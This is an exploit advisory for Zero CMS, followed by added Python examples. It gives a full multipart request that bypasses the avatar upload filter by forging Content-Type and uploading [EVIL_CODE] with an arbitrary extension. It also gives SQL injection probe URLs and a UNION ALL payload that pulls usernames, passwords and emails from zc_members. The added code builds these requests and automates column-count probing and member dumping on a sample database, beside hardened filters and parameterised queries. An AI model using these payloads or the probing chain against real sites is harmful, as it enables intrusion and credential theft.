
zerocms-sql.txt

Posted on 08 January 2008

[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Zero CMS Remote Arbitrary File Upload / SQL Injections             |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Version: <= 1.0 Alpha (Last)                                       |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Vendor: www.zero-cms.com                                           |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Discovered by: KiNgOfThEwOrLd                                      |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Intro:                                                             |
|                                                                    |
| An attacker can bypass the avatar upload extension filter by       |
| editing the Content-Type of the file part: the filter trusts that  |
| client-supplied header rather than the file's real extension.      |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Exploit:                                                           |
|                                                                    |
| Submit to index.php?act=usercp&action=avatar a request like this:  |
|                                                                    |
| -----------------------------4629606643545053171986629955          |
| Content-Disposition: form-data; name="MAX_FILE_SIZE"               |
|                                                                    |
| 20000                                                              |
| -----------------------------4629606643545053171986629955          |
| Content-Disposition: form-data; name="avupload"; filename="        |
| [FILENAME].[EVIL_EXTENSION]"                                       |
| Content-Type: image/jpeg                                           |
|                                                                    |
| [EVIL_CODE]                                                        |
|                                                                    |
| -----------------------------4629606643545053171986629955          |
| Content-Disposition: form-data; name="submit"                      |
|                                                                    |
| Upload                                                             |
| -----------------------------4629606643545053171986629955--        |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| SQL Injections:                                                    |
|                                                                    |
| Most of the variables that reach the database are not properly     |
| checked, so there are many possible SQL injections.                |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Some Examples:                                                     |
|                                                                    |
| index.php?act=poll&mode=view&id=%27                                |
| forums/index.php?f=%27                                             |
| forums/index.php?t=%27                                             |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| An Exploit Example:                                                |
|                                                                    |
| index.php?act=poll&mode=view&id=9999+union+all+select+1,username,  |
| password,email,5,6,7,8,9,10,11,12,13,14+from+zc_members            |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Surely there are other unfiltered vars, but I don't feel like      |
| checking; if you want, you can find them yourself, can't you? :P   |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
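The upload bypass above works because the server checks the Content-Type line that the attacker controls. The following is an added example, not Zero CMS code and not the advisory author's: it builds the multipart body shown in the advisory, runs it through a hypothetical filter that trusts Content-Type (the weakness described), and then through a hardened filter that looks at the filename extension and the file's leading bytes instead. The image whitelist, the magic-byte table and the placeholder standing in for [EVIL_CODE] are all constructed for the example.

```python
# Added example (not Zero CMS code): a Content-Type-only upload filter beside a
# hardened one, exercised with the request body from the advisory.
from typing import NamedTuple

# Delimiter line copied from the advisory's request body ("--" + boundary).
DELIM = b"-----------------------------4629606643545053171986629955"
IMAGE_TYPES = {"image/jpeg", "image/png", "image/gif"}
SAFE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# Leading bytes of the image formats accepted here (constructed whitelist).
MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")


class AvatarPart(NamedTuple):
    filename: str
    content_type: str
    data: bytes


def build_avatar_request(filename: str, content_type: str, data: bytes) -> bytes:
    """Reproduce the advisory's multipart body with the given avatar part."""
    lines = [
        DELIM,
        b'Content-Disposition: form-data; name="MAX_FILE_SIZE"',
        b"",
        b"20000",
        DELIM,
        b'Content-Disposition: form-data; name="avupload"; filename="%s"' % filename.encode(),
        b"Content-Type: %s" % content_type.encode(),
        b"",
        data,
        DELIM,
        b'Content-Disposition: form-data; name="submit"',
        b"",
        b"Upload",
        DELIM + b"--",  # closing delimiter
        b"",
    ]
    return b"\r\n".join(lines)


def parse_avatar_part(body: bytes) -> AvatarPart:
    """Minimal multipart parser: pull filename, Content-Type and data of the avupload part."""
    for segment in body.split(DELIM):
        if not segment.startswith(b"\r\n") or b"\r\n\r\n" not in segment:
            continue  # preamble, or the "--" tail after the closing delimiter
        header_blob, _, data = segment[2:].partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):
            data = data[:-2]  # CRLF that precedes the next delimiter
        headers = {}
        for line in header_blob.split(b"\r\n"):
            name, _, value = line.decode("latin-1").partition(":")
            headers[name.strip().lower()] = value.strip()
        disposition = headers.get("content-disposition", "")
        if 'name="avupload"' not in disposition:
            continue
        filename = disposition.split('filename="', 1)[1].split('"', 1)[0]
        return AvatarPart(filename, headers.get("content-type", ""), data)
    raise ValueError("no avupload part in request")


def vulnerable_filter(body: bytes) -> bool:
    """Hypothetical check in the style the advisory reports: trusts the client's Content-Type."""
    return parse_avatar_part(body).content_type in IMAGE_TYPES


def hardened_filter(body: bytes) -> bool:
    """Accept only a whitelisted extension whose content starts like one of the image formats."""
    part = parse_avatar_part(body)
    ext = part.filename.rsplit(".", 1)[1].lower() if "." in part.filename else ""
    if ext not in SAFE_EXTENSIONS:
        return False
    return any(part.data.startswith(magic) for magic in MAGIC)


if __name__ == "__main__":
    # Harmless placeholder standing in for the advisory's [EVIL_CODE].
    evil = build_avatar_request("avatar.php", "image/jpeg", b"<?php echo 'placeholder'; ?>")
    print("Content-Type-only filter accepts .php:", vulnerable_filter(evil))
    print("extension + magic filter accepts .php:", hardened_filter(evil))
```

Even the hardened filter is only part of a fix: the stored file should also get a server-chosen name and live outside the web root, so that whatever passes the check can never be executed as a script.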
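The UNION payload in the advisory presupposes one thing the text does not show: the attacker already knows the poll query returns 14 columns, otherwise the UNION fails. The following is an added example, not Zero CMS code: it works the injection through on an in-memory SQLite database with constructed stand-in tables (a 5-column poll table and a zc_members table carrying only the columns the advisory names), first finding the column count the standard way, then building the same payload shape, and contrasting the concatenated query with a parameterised one. The `+` characters in the advisory's URL are URL-encoded spaces, which is what the strings below contain.

```python
# Added example (not Zero CMS code): the advisory's UNION ALL injection worked
# through on SQLite. Schema and rows are constructed; the real poll query's
# 14 columns are not reproduced here.
import sqlite3
from typing import List, Optional, Sequence, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample schema standing in for Zero CMS's tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE zc_polls (id INTEGER, question TEXT, opt1 TEXT, opt2 TEXT, votes INTEGER);
        INSERT INTO zc_polls VALUES (1, 'Best editor?', 'vi', 'emacs', 42);
        CREATE TABLE zc_members (id INTEGER, username TEXT, password TEXT, email TEXT);
        INSERT INTO zc_members VALUES (1, 'admin', 'a1b2c3', 'admin@example.invalid');
        INSERT INTO zc_members VALUES (2, 'bob', 'd4e5f6', 'bob@example.invalid');
        """
    )
    return conn


def vulnerable_poll_view(conn: sqlite3.Connection, poll_id: str) -> List[Tuple]:
    """Query built by concatenation: the pattern that makes id=%27 raise a database error."""
    return conn.execute("SELECT * FROM zc_polls WHERE id = " + poll_id).fetchall()


def safe_poll_view(conn: sqlite3.Connection, poll_id: str) -> List[Tuple]:
    """Same lookup with a type check and a bound parameter; no payload reaches the SQL text."""
    return conn.execute("SELECT * FROM zc_polls WHERE id = ?", (int(poll_id),)).fetchall()


def find_column_count(conn: sqlite3.Connection, max_cols: int = 30) -> Optional[int]:
    """Step the advisory skips: add NULL columns to a UNION until the database stops erroring."""
    for n in range(1, max_cols + 1):
        probe = "9999 UNION ALL SELECT " + ",".join(["NULL"] * n)
        try:
            vulnerable_poll_view(conn, probe)
            return n
        except sqlite3.OperationalError:
            continue  # left and right SELECTs have different column counts
    return None


def build_union_payload(ncols: int, columns: Sequence[str] = ("username", "password", "email"),
                        table: str = "zc_members") -> str:
    """Mirror the advisory's shape: numeric filler in every slot, data columns in slots 2..4."""
    if ncols < len(columns) + 1:
        raise ValueError("not enough columns to carry the requested data")
    slots = [str(i) for i in range(1, ncols + 1)]
    for offset, col in enumerate(columns, start=1):
        slots[offset] = col
    return "9999 UNION ALL SELECT " + ",".join(slots) + " FROM " + table


def dump_members(conn: sqlite3.Connection) -> List[Tuple[str, str, str]]:
    """Full chain: learn the column count, then read member rows through the poll view."""
    ncols = find_column_count(conn)
    if ncols is None:
        raise RuntimeError("could not determine column count")
    rows = vulnerable_poll_view(conn, build_union_payload(ncols))
    return [(row[1], row[2], row[3]) for row in rows]


if __name__ == "__main__":
    db = make_db()
    print("columns in the poll query:", find_column_count(db))
    print("payload with 14 columns, as in the advisory:", build_union_payload(14))
    for username, password, email in dump_members(db):
        print(username, password, email)
```

With 14 columns, `build_union_payload(14)` yields exactly the `1,username,password,email,5,...,14` list the advisory uses; the fix is the bound parameter in `safe_poll_view`, which rejects every payload here before any SQL is built.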

